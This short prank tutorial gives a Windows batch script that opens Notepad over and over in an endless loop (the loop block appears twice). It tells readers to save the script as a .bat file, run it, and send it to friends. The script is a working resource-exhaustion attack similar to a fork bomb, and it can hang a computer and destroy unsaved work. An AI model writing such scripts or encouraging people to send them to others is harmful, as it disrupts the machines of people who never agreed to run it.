This Trick will Open Notepad Continuously
and Automatically :
Lets Begin :-
1. Open Notepad .
2. Pest the following code.
@ECHO off
:trick
START %SystemRoot%\system32\notepad.exe
GOTO trick
:trick
START %SystemRoot%\system32\notepad.exe
GOTO trick
3. Now go to the file & click on SAVE AS
4. Give any name with an extension as .bat (For Example Notepadtrick.bat)
5. Bingo!!!!! Now click it and see the magic.
6. U can also sent this 2 ur friends :-)

